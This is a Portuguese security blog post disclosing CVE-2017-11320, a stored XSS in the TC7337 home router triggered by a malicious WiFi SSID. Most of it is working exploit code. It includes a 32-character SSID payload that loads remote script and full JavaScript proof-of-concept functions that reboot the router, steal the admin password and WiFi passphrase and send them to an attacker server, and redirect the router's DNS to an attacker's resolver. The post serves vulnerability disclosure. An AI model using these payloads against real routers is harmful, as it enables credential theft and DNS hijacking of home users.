Roteador TC7337 : DNS Poisoning através de XSS

1501632000

Outro post em português, e adivinhem! É sobre a NET!

TL;DR :

CVE-2017–11320 : XSS Persistente através de SSID malicioso permite roubo de credenciais, reboot do roteador e até DNS Poisoning.

Tudo começou quando a nossa querida NET decidiu bloquear o acesso a qualquer SSH externo, sim não consigo mais acessar nenhum servidor pela porta 22. Qual seria a solução? Ownar o roteador ! Eu consegui ? Até agora não , mas achei esse XSS.

A vulnerabilidade reside na página de scan de redes WiFi próximas [1](wlscanresults.html) que não faz nenhum tipo de filtragem no SSID das mesmas.

wlscanresults.html wlscanresults.htmlSim, isso é a senha dela Sim, isso é a senha dela

Quando encontrei essa página, logo peguei o celular da minha namorada e subi um HotSpot com SSID ‘><script>alert(1)</script> e PAM ! Alert na cara. Bem legal e tal, mas um alert não é vulnerabilidade. Um grande problema com o SSID é que ele só aceita 32 carácteres, , então como fazer um XSS que realmente faça alguma coisa com só 32 chars ?

Tamanho importa

A forma mais fácil de diminuir o payload é carregando o JavaScript externamente utilizando o ‘src’, algo como :

            '><script src="http://evil.com/"></script>

Mas isso tem 42 carácteres :( Note uma das coisas que posso controlar é o nome do domínio. Então fui caçar o menor domínio que consegui encontrar para comprar. depois de DUAS HORA PROCURANDO eu consegui o domínio 6ks.me , um achado. Estamos agora em 40 carácteres, temos que remover 8. Outra idéia foi remover o “http://” , mas o browser vai tentar acessar 192.168.0.1/6ks.me . Me lembro de algum CTF que o que vem antes de “://” sempre especifica o protocolo a ser usado ( como em vnc:// magnet:// etc:// ) , e caso o protocolo não fosse especificado ele usaria o protocolo atual. Assim, consigo remover o “http:” , faltando retirar 3 chars. A barra no final também não é necessária, 2 chars. Para finalizar, a maioria dos browsers não se importa se você não colocar aspas no atributo.
E com 32 chars cravados :

            '><script src=//6ks.me></script>

Agora conseguimos injetar qualquer JavaScript que precisarmos. Mas o que podemos fazer? Podemos utilizar o XMLHttpRequest para fazer qualquer requisição para o roteador. Fico fuçando o roteador e vendo as requisições que ele faz e vejo que depois de fazer alguma alteração importante ele faz um request para “rebootinfo.cgi” para reiniciar o modem.

Uma coisa interessante é que no código de todas as páginas existe uma variável chamada “sessionKey” :

            var sessionKey = '540153280';

Essa key muda em toda requisição e é passada como parâmetro GET em todos os .cgi , se não for válida ele não realiza a ação. Alguma forma tosca de CSRF Token.

Então antes de fazer a request para “rebootar” o modem, eu preciso fazer outro request para uma página qualquer para pegar a sessionKey. Abaixo o JS à ser injetado no browser :

            function reboot_router() {
                // XSS reiniciar modem
                // ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                // Por quê? Porque é divertido ver um XSS fazer o LED apagar

                xmlhttp=new XMLHttpRequest();
                xmlhttp.open("GET", "/resetrouter.html", false); // GET na interface
                xmlhttp.send();
                var w = xmlhttp.responseText.indexOf("Key") ; // Procurando pelo sessionKey
                var sessionKey = xmlhttp.responseText.slice(w,w+20).match(/'([^']+)'/)[1] ; // Regex porque a key está dentro de aspas

                xmlhttp=new XMLHttpRequest();
                xmlhttp.open("GET", "/rebootinfo.cgi?sessionKey="+sessionKey, false); // Requisita a página de reboot com a sessionKey
                xmlhttp.send();
            }

Fuçando mais um pouco encontro a página backupsettings.cmd que nada mais é um XML com todas as configurações do modem, inclusive a senha do WiFi em Base64 e a senha do Administrador em PlainText. O mais legal é que não precisa da sessionKey.

            function get_passwords(attackers_server) {
                // attackers_server = servidor para enviar as credenciais
                // ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                // Pegar a senha do WiFi e a senha do administrador
                // através do backup das configurações

                xmlhttp=new XMLHttpRequest();
                xmlhttp.open("GET", "/backupsettings.cmd", false); // XML da configuração do roteador
                xmlhttp.send();
                var k = xmlhttp.responseText.indexOf("Admin") ; // Procurando pela senha do Administrador
                var y = xmlhttp.responseText.indexOf("KeyPassphrase") ; // Procurando pela senha do WiFi
                // Adicionando uma imagem na página atual para enviar as credenciais através de GET para o servidor do atacante
                document.write('<img src="'+attackers_server+'?net='+ encodeURIComponent(xmlhttp.responseText.slice(k,k+100)+xmlhttp.responseText.slice(y,y+80))+'">'); 
            }

Por fim, mas não menos importante. Alterando o DNS do roteador nós conseguimos DNS Poisoning.

            function dns_poisoning(attackers_dns) {
                // attackers_dns = servidor DNS malicioso
                // ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ caralho esse código ta muito feio, desculpa mundo
                // Altera os servidores de DNS para o do atacante

                xmlhttp=new XMLHttpRequest();   
                xmlhttp.open("GET", "/rede-dnsv4.html", false); 
                xmlhttp.send();
                var w = xmlhttp.responseText.indexOf("Key") ;  // Procurando pelo sessionKey
                var sessionKey = xmlhttp.responseText.slice(w,w+20).match(/'([^']+)'/)[1] ; // Regex porque a key está dentro de aspas
                var i_wanip = xmlhttp.responseText.indexOf("wanip") ;
                var wanip = xmlhttp.responseText.slice(i_wanip,i_wanip+30).match(/'([^']+)'/)[1] ;
                var i_wansubnet = xmlhttp.responseText.indexOf("wansubnet") ; 
                var wansubnet = xmlhttp.responseText.slice(i_wansubnet,i_wansubnet+30).match(/'([^']+)'/)[1] ;
                var i_wangatewayip = xmlhttp.responseText.indexOf("wangatewayip") ; 
                var wangatewayip = xmlhttp.responseText.slice(i_wangatewayip,i_wangatewayip+30).match(/'([^']+)'/)[1] ;

                xmlhttp=new XMLHttpRequest();
                xmlhttp.open("GET", "/rede-dnsv4.cgi?enblDhcpClnt=0&wanIpAddress="+wanip+"&wanIfName=wanbridge&wanSubnetMask="+wansubnet+"&wanIntfGateway="+wangatewayip+"&dnsPrimary="+attackers_dns+"&dnsSecondary="+attackers_dns+"&sessionKey="+sessionKey, false);
                xmlhttp.send(); // Fazendo a requisiço para SALVAR as novas configurações do DNS

                // Depois de salvar, precisamos aplicar as configurações, fuck logic

                //Getting a brand NEW SessionKey
                xmlhttp=new XMLHttpRequest();   
                xmlhttp.open("GET", "/rede-dnsv4.html", false); // GET the DNS Config page
                xmlhttp.send();
                var w = xmlhttp.responseText.indexOf("Key") ;  // Procurando pelo sessionKey
                var sessionKey = xmlhttp.responseText.slice(w,w+20).match(/'([^']+)'/)[1] ; // Regex porque a key está dentro de aspas

                xmlhttp=new XMLHttpRequest();   
                xmlhttp.open("GET", "/wandnscfg.cmd?sessionKey="+sessionKey, false); // Aplicando as confs
                xmlhttp.send();
            }

PoC

            // Vulnerable URL : https://your.rou.ter.ip/wlscanresults.html
            // XSS through SSID : '><script src=//6ks.me></script>   ( Exactly 32 bytes u_u )
            //                             ^
            //  5char domains are running  |    'src' does not requires quotes , and passing the URL with ony '//' 
            //  out, grab yours !          +---> it will cause the browser to make the request with the current protocol,
            //                                   which is HTTP , duh
            // Below is the content of 6ks.me
            // index.html ( which is just a JavaScript actually, but we have to use the index to fit the 32 chars ) :

            function get_passwords(attackers_server) {
                // attackers_server = server to send the credentials
                // ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                // XSS to get Admin's login/passwd + Wifi passphrase
                // from backup settings

                xmlhttp=new XMLHttpRequest();
                xmlhttp.open("GET", "/backupsettings.cmd", false); // GET the Backup XML
                xmlhttp.send();
                var k = xmlhttp.responseText.indexOf("Admin") ; // Search for Admin's Login and Password
                var y = xmlhttp.responseText.indexOf("KeyPassphrase") ; // Search for Wifi PassPhrase
                // Add a img requesting the attacker website with the leaked passwords in the GET parameters
                document.write('<img src="'+attackers_server+'?net='+ encodeURIComponent(xmlhttp.responseText.slice(k,k+100)+xmlhttp.responseText.slice(y,y+80))+'">'); 
            }

            function reboot_router() {
                // XSS + CSRF reboot router
                // ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                // Why? Because It's fun to watch a XSS doing 'physical' stuff

                xmlhttp=new XMLHttpRequest();
                xmlhttp.open("GET", "/resetrouter.html", false); // GET the page of the reset interface
                xmlhttp.send();
                var w = xmlhttp.responseText.indexOf("Key") ; // Search for the SessionKey, some sort of CSRF Token
                var sessionKey = xmlhttp.responseText.slice(w,w+20).match(/'([^']+)'/)[1] ; // Regex because the key is inside quotes

                xmlhttp=new XMLHttpRequest();
                xmlhttp.open("GET", "/rebootinfo.cgi?sessionKey="+sessionKey, false); // Request the reboot page with the CSRF token
                xmlhttp.send();
            }

            function dns_poisoning(attackers_dns) {
                // attackers_dns = malicious DNS Server
                // ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ holy shit my code is ugly as fuck , sorry world
                // Alter the DNS Config of the Router
                // changing the Primary and Secondary DNS to the attacker's one

                xmlhttp=new XMLHttpRequest();   
                xmlhttp.open("GET", "/rede-dnsv4.html", false); // GET the DNS Config page
                xmlhttp.send();
                var w = xmlhttp.responseText.indexOf("Key") ; // Search for the SessionKey, some sort of CSRF Token
                var sessionKey = xmlhttp.responseText.slice(w,w+20).match(/'([^']+)'/)[1] ; // Regex because the key is inside quotes
                var i_wanip = xmlhttp.responseText.indexOf("wanip") ;
                var wanip = xmlhttp.responseText.slice(i_wanip,i_wanip+30).match(/'([^']+)'/)[1] ;
                var i_wansubnet = xmlhttp.responseText.indexOf("wansubnet") ; 
                var wansubnet = xmlhttp.responseText.slice(i_wansubnet,i_wansubnet+30).match(/'([^']+)'/)[1] ;
                var i_wangatewayip = xmlhttp.responseText.indexOf("wangatewayip") ; 
                var wangatewayip = xmlhttp.responseText.slice(i_wangatewayip,i_wangatewayip+30).match(/'([^']+)'/)[1] ;

                xmlhttp=new XMLHttpRequest();
                xmlhttp.open("GET", "/rede-dnsv4.cgi?enblDhcpClnt=0&wanIpAddress="+wanip+"&wanIfName=wanbridge&wanSubnetMask="+wansubnet+"&wanIntfGateway="+wangatewayip+"&dnsPrimary="+attackers_dns+"&dnsSecondary="+attackers_dns+"&sessionKey="+sessionKey, false);
                xmlhttp.send(); // Send the request to SAVE the Primary and Secondary DNS with the CSRF Token

                //After saving we need to apply the settings. yeah, fuck logic --'

                //Getting a brand NEW SessionKey
                xmlhttp=new XMLHttpRequest();   
                xmlhttp.open("GET", "/rede-dnsv4.html", false); // GET the DNS Config page
                xmlhttp.send();
                var w = xmlhttp.responseText.indexOf("Key") ; // Search for the SessionKey, some sort of CSRF Token
                var sessionKey = xmlhttp.responseText.slice(w,w+20).match(/'([^']+)'/)[1] ; // Regex because the key is inside quotes

                xmlhttp=new XMLHttpRequest();   
                xmlhttp.open("GET", "/wandnscfg.cmd?sessionKey="+sessionKey, false); // GET the apply DNS page
                xmlhttp.send();
            }

            // Choose your path !
            //get_passwords("http://evil.domain/") ;
            //reboot_router();
            dns_poisoning("1.3.3.7")

PostMortem

TimeLine

Refs

[1] https://media.blackhat.com/eu-13/briefings/Heiland/bh-eu-13-practical-exploitation-heiland-slides.pdf